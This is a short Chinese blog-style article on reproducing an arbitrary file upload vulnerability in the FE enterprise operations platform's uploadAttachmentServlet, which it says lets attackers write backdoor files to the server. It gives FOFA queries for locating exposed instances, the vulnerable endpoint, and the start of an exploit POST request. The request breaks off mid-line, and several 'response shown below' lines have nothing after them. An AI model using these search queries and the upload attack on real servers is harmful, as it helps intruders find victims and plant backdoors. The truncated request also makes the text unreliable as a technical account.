本文主要是介绍FE企业运营管理平台任意文件上传漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
简介
飞企互联-FE企业运营管理平台 uploadAttachmentServlet存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件。
漏洞复现
FOFA语法:
icon_hash="-1159839950"
app=“FE-协作平台”
访问界面返回信息如下所示:
POC:
/servlet/uploadAttachmentServlet
GET请求访问: http://ip:port/servlet/uploadAttachmentServlet
返回信息如下所示:
可能存在该漏洞:
验证:
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host:
U
这篇关于FE企业运营管理平台任意文件上传漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
